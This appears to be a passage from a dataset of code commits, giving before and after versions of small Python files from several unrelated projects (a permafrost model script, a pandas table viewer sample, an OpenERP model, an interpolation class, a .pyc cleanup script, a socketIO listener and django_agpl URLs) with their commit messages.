from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
print x._values["ALT"][:]
Use BMI method to get ALT value
It looks like it may not give the correct answer, though.#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
# print x._values["ALT"][:]
print x.get_value('soil__active_layer_thickness')
|
<commit_before>#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
print x._values["ALT"][:]
<commit_msg>Use BMI method to get ALT value
It looks like it may not give the correct answer, though.<commit_after>#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
# print x._values["ALT"][:]
print x.get_value('soil__active_layer_thickness')
|
7f4876b1b220b8c3c26ce1490a76adf9721da4da
|
sample/pandas-example.py
|
sample/pandas-example.py
|
#!/usr/bin/env python
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
|
#!/usr/bin/env python3
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
|
Make python3 default also for the samples
|
Make python3 default also for the samples
|
Python
|
mit
|
wavexx/gtabview
|
#!/usr/bin/env python
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
Make python3 default also for the samples
|
#!/usr/bin/env python3
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
|
<commit_before>#!/usr/bin/env python
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
<commit_msg>Make python3 default also for the samples<commit_after>
|
#!/usr/bin/env python3
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
|
#!/usr/bin/env python
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
Make python3 default also for the samples#!/usr/bin/env python3
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
|
<commit_before>#!/usr/bin/env python
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
<commit_msg>Make python3 default also for the samples<commit_after>#!/usr/bin/env python3
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
|
c21318fa5c125e54160f67d410cf4572a2f9a47e
|
addons/web_calendar/contacts.py
|
addons/web_calendar/contacts.py
|
from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact'),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}
|
from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact',required=True),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}
|
Add required on field res.partner from model Contacts to avoid the creation of empty coworkers
|
[FIX] Add required on field res.partner from model Contacts to avoid the creation of empty coworkers
|
Python
|
agpl-3.0
|
havt/openerp-web,havt/openerp-web,havt/openerp-web,havt/openerp-web,havt/openerp-web
|
from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact'),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}[FIX] Add required on field res.partner from model Contacts to avoid the creation of empty coworkers
|
from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact',required=True),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}
|
<commit_before>from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact'),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}<commit_msg>[FIX] Add required on field res.partner from model Contacts to avoid the creation of empty coworkers<commit_after>
|
from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact',required=True),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}
|
from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact'),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}[FIX] Add required on field res.partner from model Contacts to avoid the creation of empty coworkersfrom openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact',required=True),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}
|
<commit_before>from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact'),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}<commit_msg>[FIX] Add required on field res.partner from model Contacts to avoid the creation of empty coworkers<commit_after>from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact',required=True),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}
|
31986c4c7d5781f0924289308d99754c81d29710
|
pml/units.py
|
pml/units.py
|
import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
|
import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
diff = np.diff(y)
if not (np.all(diff > 0)):
raise ValueError('''Given coefficients must be
monotonely increasing.''')
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
|
Raise error when creating PChip object with not monotonely increasing y list
|
Raise error when creating PChip object with not monotonely increasing y list
|
Python
|
apache-2.0
|
willrogers/pml,willrogers/pml
|
import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
Raise error when creating PChip object with not monotonely increasing y list
|
import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
diff = np.diff(y)
if not (np.all(diff > 0)):
raise ValueError('''Given coefficients must be
monotonely increasing.''')
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
|
<commit_before>import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
<commit_msg>Raise error when creating PChip object with not monotonely increasing y list<commit_after>
|
import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
diff = np.diff(y)
if not (np.all(diff > 0)):
raise ValueError('''Given coefficients must be
monotonely increasing.''')
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
|
import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
Raise error when creating PChip object with not monotonely increasing y listimport numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
diff = np.diff(y)
if not (np.all(diff > 0)):
raise ValueError('''Given coefficients must be
monotonely increasing.''')
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
|
<commit_before>import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
<commit_msg>Raise error when creating PChip object with not monotonely increasing y list<commit_after>import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
diff = np.diff(y)
if not (np.all(diff > 0)):
raise ValueError('''Given coefficients must be
monotonely increasing.''')
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
|
95d2036aab2e3d154f4f292ef8624d6d02d48ac0
|
cleanpyc.py
|
cleanpyc.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def chmod(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
chmod('./')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def rmpyc(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
rmpyc('./')
|
Change function name chmod to rmpyc
|
Change function name chmod to rmpyc
|
Python
|
apache-2.0
|
xiilei/pytools,xiilei/pytools
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def chmod(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
chmod('./')
Change function name chmod to rmpyc
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def rmpyc(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
rmpyc('./')
|
<commit_before>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def chmod(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
chmod('./')
<commit_msg>Change function name chmod to rmpyc<commit_after>
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def rmpyc(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
rmpyc('./')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def chmod(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
chmod('./')
Change function name chmod to rmpyc#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def rmpyc(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
rmpyc('./')
|
<commit_before>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def chmod(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
chmod('./')
<commit_msg>Change function name chmod to rmpyc<commit_after>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def rmpyc(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
rmpyc('./')
|
92d7058347da755ff90621c56b36959521dfc99a
|
scripts/commandsocket.py
|
scripts/commandsocket.py
|
import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print("hello")
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")
|
import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print(args)
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")
|
Make sockets print actual output
|
Make sockets print actual output
Make sockets print actual output
|
Python
|
mit
|
willdavidc/piel,willdavidc/piel,willdavidc/piel,willdavidc/piel,willdavidc/piel
|
import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print("hello")
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")Make sockets print actual output
Make sockets print actual output
|
import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print(args)
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")
|
<commit_before>import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print("hello")
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")<commit_msg>Make sockets print actual output
Make sockets print actual output<commit_after>
|
import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print(args)
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")
|
import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print("hello")
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")Make sockets print actual output
Make sockets print actual outputimport RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print(args)
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")
|
<commit_before>import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print("hello")
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")<commit_msg>Make sockets print actual output
Make sockets print actual output<commit_after>import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print(args)
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")
|
3a44dbeec871aa057c4d5b42c9089a8d2b649063
|
django_agpl/urls.py
|
django_agpl/urls.py
|
# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('django_agpl.views',
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
|
# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
